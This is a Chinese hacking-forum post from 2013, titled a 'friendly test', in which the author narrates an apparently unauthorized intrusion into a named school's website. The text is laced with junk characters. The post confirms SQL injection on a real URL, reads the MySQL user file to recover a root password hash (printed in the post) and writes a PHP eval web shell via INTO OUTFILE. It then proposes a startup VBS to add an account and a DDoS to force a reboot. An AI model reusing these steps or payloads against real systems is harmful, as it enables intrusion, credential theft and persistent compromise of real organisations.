找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2856|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
8 K  a- g) p6 p* s& b* }! S发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
  g" }4 z: c+ R( f5 ^! U' Q6 D& }
1 A3 I& X+ X8 i

  u- p4 J4 T7 G( J+ F常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 : `. b3 j1 s* B  z7 b0 P
5 K' q4 f) C9 _5 R/ N$ }
那么想可以直接写入shell ,getshell有几个条件:# S5 V( ?+ ]1 R" R0 M7 r+ O
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
# i# f. b$ I% [0 @4 d+ M/ U6 I4 }! B5 Z/ o  Q
试着爆绝对路径:) b& y/ ?. \5 _- K0 j
1./phpMyAdmin/index.php?lang[]=1  ! U: m1 j& I! N! `! _  ^. e2 k
2./phpMyAdmin/phpinfo.php  4 j- ^3 X6 q- f- e5 C
3./load_file()  
( |0 F" E$ U$ ~. T: e: f; u4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
& r& g) z8 Q5 T8 T$ z& U- t! _5./phpmyadmin/libraries/select_lang.lib.php  : j7 W8 t/ c, v: p  q( X
6./phpmyadmin/libraries/lect_lang.lib.php  $ T. D# e- ^! j
7./phpmyadmin/libraries/mcrypt.lib.php   . }( S6 A5 ^4 d# ?1 B
8./phpmyadmin/libraries/export/xls.php  
" _4 f5 R7 C& ?: u; w" N
% ]( H. F; R$ {3 @均不行...........................% P! P& c# D4 P  c" C4 }% L9 ?

  X2 }# h* }  G# g- }4 X御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
8 D! I" J1 a8 h; v( {0 c; k& n& j/ Y4 Q
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 9 O" I# d2 F$ I) G
6 ^' s7 ]& B7 Q' v
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
) t1 z! _+ ]/ N' x; h9 E) e6 Q, l! S6 s+ a
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
, _. S; B: j$ R! l2 N, \% D9 T* c, X
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 4 E- Y' [# I% e; ~% X4 h; r

: P2 Z" G  t; H/ h4 ~+ R, {& ahttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
( B) r" S& w2 H, @8 }3 B! D& N3 p! e1 u# {% C
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ' w) S: S) u, n) ~3 Z* k0 G
" E. e; ^2 p4 S) G
成功读到root密码:
. B, v6 }9 x7 W3 b- P: ^0 f/ e- q. E/ |+ P2 _
17---- r(0072)
9 w1 K3 E# d5 ^18---- o(006f)( w5 f6 q; k+ u! M
19---- o(006f)
$ N+ A" T2 B% D20---- t(0074)
& C0 {! ?% Q' ^: Y9 h. L# ^21---- *(002a)8 {# T# |& B2 e# u; W! t- U
22---- 8(0038)& B9 x; m9 q- R0 Y0 {
23---- 2(0032)
9 E3 |: @0 G: y24---- E(0045)
+ B0 p5 n: k5 `7 ^, ]. N+ ]25---- 1(0031)0 i5 {3 z, Z& w, W; h# f5 P9 i
26---- C(0043). K1 I! g+ B, h
27---- 5(0035)
# b; [$ D9 N( L28---- 8(0038)5 V2 _& R- w$ `& o# L' P! a
29---- 2(0032)
6 e5 b9 `$ }0 u) U9 O3 d9 y  ~* j30---- 8(0038)
* U0 G9 _) R- ^% r, ]31---- A(0041)
  o/ F3 b" H5 }5 k8 X, D4 ?' {32---- 9(0039)
5 @9 H. F( N3 ~4 U. q33---- B(0042)1 S4 K: Z" Q% r6 g+ y
34---- 5(0035)
' y2 _0 c/ r9 h/ [9 j35---- 4(0034)
+ F- i8 o8 S3 a8 x- A36---- 8(0038)2 s2 d1 |) A) F7 I7 l7 t" x( _
37---- 6(0036)# G% @# }; J- V% {' R
38---- 4(0034)) D+ d  Y7 ~) f
39---- 9(0039)
: c# w- S- K! S. r* B+ u# v, B6 W# z40---- 1(0031). x" O) o0 o# @/ O# G: L
41---- 1(0031)3 E5 \, ]7 j1 D" L5 V% f6 T
42---- 5(0035)
' U) L% u* \) y$ ~' H" O+ l; I2 p43---- 3(0033)1 G' D( C- q7 m5 A; e1 T: `# n/ T
44---- 5(0035)/ `2 X% S6 p. S8 S; S! m- o0 [+ w
45---- 9(0039)
/ D( a  [) a  l( b0 p46---- 8(0038)
9 c. _  t, H# ]. I; t+ Z; N# E47---- F(0046)3 f. J; y& e1 o; Z6 k- n+ n/ x
48---- F(0046)
( w! f6 |2 M! B" Q: r/ X  ~49---- 4(0034)
) k# f6 ]( h7 e9 j8 h( k( {' o4 B( q3 e' F. j50---- F(0046)% E6 o# ]6 O2 r" c% a
51---- 0(0030)
' j# ~3 `/ `5 [- i- @$ Z6 c$ L* k52---- 3(0033), i; K  H" q* a
53---- 2(0032)' y0 ^! T$ ^! V
54---- A(0041)
0 z2 _$ v( X: G; g# N* F% s4 @55---- 4(0034)/ Q; t/ C: ]; m& [& j, x: N
56---- A(0041)/ w9 _8 S' R2 H9 H: {( f
57---- B(0042)
9 [3 c5 g) d- f3 T; i0 z58---- *(0044)2 U. i# S% M3 E2 o# A, C
59---- *(0035)
+ l/ i* e+ t/ U2 d- I) O60---- *(0041)9 z2 l; t, O5 s2 Y
61---- *0032)
/ Z4 P) T4 p% n4 ^" m0 y1 U- _5 }- j; o* b& e; ]3 q
解密后成功登陆phpmyamin
% Z, R- B. Z. z5 y/ E$ O& a/ ^: V3 S                          7 U8 C& t3 c$ ~0 S, Z+ p3 g2 t
8 x6 b" S4 A) W$ x$ [5 @" d, F  u9 W
                             * ^, L# \5 p! Q+ Q2 O; O
/ v2 G. c% y/ c; X2 d% \
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
6 Q- `* K- p3 }# C# R7 ~- V- B1 ?" }- e8 s/ Z2 x
成功执行,拿下shell,菜刀连接:. E. b7 |( e1 Y
/ d3 ~4 V% B8 U, j* s$ M( J4 r
服务器不支持asp,aspx,php提权无果...................
1 P. @2 B0 G2 r/ F
8 e! I; i7 k$ R' m/ c! k" b+ F但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:- D/ x. ]) e1 K
服务器上已经有个隐藏帐号了
! Y6 ]. B" \' Z0 Z+ _
别名     administrators
% x7 j) l# j( J9 h1 I8 }( I注释     管理员对计算机/域有不受限制的完全访问权

/ T9 ~" z6 X' x+ I5 j  p; F
成员

5 _; l% Y) a9 g" C5 u' L  f
-------------------------------------------------------------------------------
9 c+ ?* {7 F/ r) \admin
8 `% H: @2 P4 C' _* E2 LAdministrator
1 f% G6 B6 n" xslipper$
: z+ y9 O" Z2 r8 x* x+ tsqluser
6 P! J$ J. e+ D! j3 Q+ e命令成功完成。 ! j& o( p" M5 i3 J7 T5 s

5 g& Q" w7 @8 g) Q" p服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。$ W/ o5 M  `  {5 h

3 }, n8 o# w' wddos服务器重启,不然就只能坐等服务器重启了...............................
0 M/ r/ z/ C! Z  U1 K0 C
2 E, C' b' h* b% P; b+ ~      

* s! {& j! Z0 G: ]: H- G+ }! y

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表